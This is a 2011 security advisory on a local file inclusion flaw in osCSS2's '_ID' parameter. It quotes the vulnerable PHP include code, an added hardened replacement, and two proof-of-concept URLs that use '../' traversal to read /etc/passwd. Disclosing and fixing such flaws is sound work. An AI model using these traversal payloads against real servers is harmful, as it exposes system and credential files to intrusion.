osCSS2 – ‘_ID’ Local file Inclusion

  • Author: Stefan Schurtz
    Date: 2011-11-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/18099/
  • Advisory:		osCSS2 "_ID" parameter Local file inclusion
    Advisory ID: 	SSCHADV2011-034
    Author:		Stefan Schurtz
    Affected Software:	Successfully tested on osCSS2 2.1.0 (latest version)
    Vendor URL:	http://oscss.org/
    Vendor Status: 	Fixed in svn branch 2.1.0 and reported in develop version 2.1.1
    
    ==========================
    Vulnerability Description
    ==========================
    
    The "_ID" parameter of osCSS2 2.1.0 is prone to a Local File Inclusion (LFI) vulnerability.
    
    ==========================
    Vulnerable code
    ==========================
    
    //.htaccess
    RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}
    
    //content.php
    require($page->path_gabarit());
    
    // includes/classes/page.php
    public function pile_file_lang($path_file){
        global $lang;
        if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;

        if(!in_array($path_file,(array)$this->PileFileLang))
            include_once($path_file);
    }
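    The check above only verifies that the string begins with DIR_FS_CATALOG, which does nothing against "../" segments appended after that prefix. The following is an added example of a hardened replacement for this include pattern; it is not osCSS2 code, and the DIR_FS_CATALOG value and function names are assumptions for the illustration.

```php
<?php
// Added example, not part of the osCSS2 code base. DIR_FS_CATALOG value is assumed.
define('DIR_FS_CATALOG', '/var/www/catalog/');

/**
 * Return the canonical path of $path_file only if it names a plain page
 * file that resolves to a location inside DIR_FS_CATALOG; otherwise null.
 */
function safe_catalog_path(string $path_file): ?string
{
    // Primary control: allowlist the shape of a page name. No slashes,
    // no "..", no null bytes, so "../../etc/passwd" is rejected outright.
    if (!preg_match('/^[A-Za-z0-9_\-]+\.php$/', $path_file)) {
        return null;
    }

    // Secondary control: compare canonical paths, which also catches
    // symlinks that point outside the catalog directory.
    $base = realpath(DIR_FS_CATALOG);
    $real = realpath(DIR_FS_CATALOG . $path_file);
    if ($base === false || $real === false) {
        return null;   // base dir or requested file does not exist
    }
    // Trailing separator so that "/var/www/catalog2/..." does not match.
    if (strpos($real, rtrim($base, '/') . '/') !== 0) {
        return null;
    }
    return $real;
}

/**
 * Hardened counterpart of pile_file_lang(): refuses to include anything
 * that did not pass safe_catalog_path(). Returns true when included.
 */
function pile_file_lang_safe(string $path_file): bool
{
    $real = safe_catalog_path($path_file);
    if ($real === null) {
        error_log('Rejected page include: ' . $path_file);
        return false;
    }
    include_once $real;
    return true;
}
```

    The same check belongs in front of the require() in content.php, since path_gabarit() is fed by the rewritten _ID parameter.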
    
    ==================
    PoC-Exploit
    ==================
    
    http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
    http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd
    
    =========
    Solution
    =========
    
    Fixed in svn branch 2.1.0 and reported in develop version 2.1.1
    
    ====================
    Disclosure Timeline
    ====================
    
    08-Nov-2011 - informed vendor
    08-Nov-2011 - release date of this security advisory
    
    ========
    Credits
    ========
    
    Vulnerability found and advisory written by Stefan Schurtz.
    
    ===========
    References
    ===========
    
    http://oscss.org/
    http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html
    http://dev.oscss.org/task/892
    http://www.rul3z.de/advisories/SSCHADV2011-034.txt